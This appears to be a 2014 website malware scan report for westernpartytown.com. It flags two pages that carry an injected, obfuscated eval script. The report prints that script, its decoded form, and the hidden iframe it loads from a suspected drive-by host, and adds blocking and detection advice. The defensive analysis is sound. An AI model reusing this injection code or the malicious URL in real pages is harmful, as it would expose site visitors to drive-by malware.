Scanned pages/files
Request | Server response | Status |
http://www.westernpartytown.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 04 Oct 2014 20:05:34 GMT Location: http://westernpartytown.com/ Server: nginx Content-Length: 178 Content-Type: text/html | clean |
http://westernpartytown.com/ | 200 OK Content-Length: 16635 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Obfuscated script as served in the page body (p.a.c.k.e.r-style eval wrapper; the listing is truncated by the scanner): eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\\167\53'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\x5C\x62'+e(c)+'\x5C\142','g'),k[c]);return p;}('\x4B\40\143=L\x20O(\51\73\143\56\x48\x28c\56\105\50\51\531\x29;\107(11\x2E\132\x26&\x6C\56\171\5614\50\x27R\134W\x5Cg\\\x65\\\144\134\166\47\51\75\ Decoded script: var exp=new Date();exp.setDate(exp.getDate()+1);if(navigator.cookieEnabled&&document.cookie.indexOf('_\x5Fu\x6D\x74\144\x3D')==-1){document.write('\x3C\x69\x66r\141\x6D\145\x20\x77\151\144\164\150=\x22'+Math.floor(Math.random()*100+100)+'\42\x20\x68\x65ig\150\164\75\"'+Math.floor(Math.random()*100+100)+'\"\x20\146\x72\x61\155e\142or\144e\x72\75\x22\60\"\x20\163\164yl\145\75\x22\x70\157\163\151\x74\x69\x6F\x6E\72\141\142\163ol\165\164e\x3B\154\x65\x66t\72-'+Math.floor(Math.random()*1 Rendered output observed at scan time (hidden iframe): <iframe width="112" height="165" frameborder="0" style="position:absolute;left:-284px;top:-209px" src="http://wpbigfecv.longmusic.com/index.php?go=1"></iframe> Analysis: the decoded code first checks navigator.cookieEnabled and then looks for a cookie named __utmd (the name is spelled with hex/octal escapes in the source, presumably to defeat simple string matching, and mimics the Google Analytics __utm* cookie family). When that cookie is absent it calls document.write to inject an iframe whose width and height are random values in the 100-199px range, positioned absolutely at a negative left/top offset so it is never visible, and whose src is http://wpbigfecv.longmusic.com/index.php?go=1. The exp date set one day ahead suggests a cookie is then written so each visitor receives the payload at most once per day, but the decoded output is cut off before any cookie assignment, so that part is inferred rather than observed. The iframe dimensions and offsets differ from those recorded for /index.html below, consistent with per-request randomization of the markers. Treat the iframe target as a likely drive-by landing page: block it at the egress proxy, open it only inside an isolated analysis environment, and search every HTML file and template on the host for the eval(function(p,a,c,k,e,d) prefix rather than cleaning only the two files flagged here. Antivirus reports:
| ||
http://sm6.sitemeter.com/js/counter.js?site=sm6westpartytown | HTTP/1.1 302 Redirect Date: Sat, 04 Oct 2014 20:05:37 GMT Location: http://sm6.sitemeter.com/js/counter.asp?site=sm6westpartytown Server: Microsoft-IIS/6.0 Content-Length: 184 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://sm6.sitemeter.com/js/counter.asp?site=sm6westpartytown | 200 OK Content-Length: 7567 Content-Type: application/x-javascript | clean |
http://www.westernpartytown.com/index.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 04 Oct 2014 20:05:36 GMT Location: http://westernpartytown.com/index.html Server: nginx Content-Length: 178 Content-Type: text/html | clean |
http://westernpartytown.com/index.html | 200 OK Content-Length: 16645 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Same injected script and decoded payload as recorded for http://westernpartytown.com/ above; only the random iframe size and offset differ (185x145 at left:-251px/top:-225px here versus 112x165 at -284px/-209px there), which confirms that those values are regenerated on every response and must not be used as the detection signature - match on the eval(function(p,a,c,k,e,d) prefix or the iframe src instead. Obfuscated script as served: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\\167\53'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\x5C\x62'+e(c)+'\x5C\142','g'),k[c]);return p;}('\x4B\40\143=L\x20O(\51\73\143\56\x48\x28c\56\105\50\51\531\x29;\107(11\x2E\132\x26&\x6C\56\171\5614\50\x27R\134W\x5Cg\\\x65\\\144\134\166\47\51\75\ Decoded script: var exp=new Date();exp.setDate(exp.getDate()+1);if(navigator.cookieEnabled&&document.cookie.indexOf('_\x5Fu\x6D\x74\144\x3D')==-1){document.write('\x3C\x69\x66r\141\x6D\145\x20\x77\151\144\164\150=\x22'+Math.floor(Math.random()*100+100)+'\42\x20\x68\x65ig\150\164\75\"'+Math.floor(Math.random()*100+100)+'\"\x20\146\x72\x61\155e\142or\144e\x72\75\x22\60\"\x20\163\164yl\145\75\x22\x70\157\163\151\x74\x69\x6F\x6E\72\141\142\163ol\165\164e\x3B\154\x65\x66t\72-'+Math.floor(Math.random()*1 Rendered output observed at scan time (hidden iframe): <iframe width="185" height="145" frameborder="0" style="position:absolute;left:-251px;top:-225px" src="http://wpbigfecv.longmusic.com/index.php?go=1"></iframe> Antivirus reports:
| ||
http://westernpartytown.com/directions.html | 200 OK Content-Length: 9484 Content-Type: text/html | clean |
http://westernpartytown.com/contact.html | 200 OK Content-Length: 11503 Content-Type: text/html | clean |
http://westernpartytown.com/test404page.js | 404 Not Found Content-Length: 564 Content-Type: text/html | clean |
http://www.westernpartytown.com/contact.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 04 Oct 2014 20:05:39 GMT Location: http://westernpartytown.com/contact.html Server: nginx Content-Length: 178 Content-Type: text/html | clean |
http://www.westernpartytown.com/directions.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 04 Oct 2014 20:05:40 GMT Location: http://westernpartytown.com/directions.html Server: nginx Content-Length: 178 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: westernpartytown.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, must-revalidate, proxy-revalidate
Connection: close
Date: Sat, 04 Oct 2014 20:05:35 GMT
Pragma: public
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 05 Oct 2014 20:05:35 GMT
X-Page-Speed: 1.6.29.5-3346
GET / HTTP/1.1
Host: westernpartytown.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, must-revalidate, proxy-revalidate
Connection: close
Date: Sat, 04 Oct 2014 20:05:35 GMT
Pragma: public
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 05 Oct 2014 20:05:35 GMT
X-Page-Speed: 1.6.29.5-3346
Second query (visit from search engine):
GET / HTTP/1.1
Host: westernpartytown.com
Referer: http://www.google.com/search?q=westernpartytown.com
Result:
The response headers match the first query (200 OK with no Location header), so no Referer-conditional redirect was observed. Note that this check only looks for redirects keyed on a search-engine Referer; it does not contradict the malicious finding above, which is an iframe injected into the response body rather than a redirect, and it says nothing about payloads keyed on other signals such as User-Agent or cookies.
GET / HTTP/1.1
Host: westernpartytown.com
Referer: http://www.google.com/search?q=westernpartytown.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=westernpartytown.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Note: absence from Safe Browsing is not evidence that the site is clean - the scanner above observed the injected iframe live on both / and /index.html at scan time. Blocklists lag behind detection, so the infection should be remediated and the listing status re-checked afterwards rather than treated as a clean bill of health.
Query: http://yandex.com/infected?l10n=en&url=http://westernpartytown.com/
Result: westernpartytown.com is not infected or malware details are not published yet.
Result: westernpartytown.com is not infected or malware details are not published yet.
Note: as with Safe Browsing, this reflects only what Yandex has published so far; the hidden-iframe injection recorded in the scan above was present regardless of this verdict.